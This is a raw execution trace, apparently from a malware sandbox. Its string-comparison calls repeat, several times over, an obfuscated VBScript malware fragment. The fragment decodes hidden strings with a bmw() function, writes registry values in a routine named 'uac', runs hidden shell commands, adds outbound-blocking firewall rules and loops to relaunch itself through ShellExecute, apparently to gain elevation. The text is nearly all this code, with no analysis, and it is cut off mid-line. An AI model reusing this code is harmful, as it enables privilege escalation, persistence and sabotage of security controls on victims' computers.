bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.351] wcsncmp (_String1="Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.351] wcsncmp (_String1="emove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.351] wcsncmp (_String1="move rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.351] wcsncmp (_String1="ove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.351] wcsncmp (_String1="ve rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 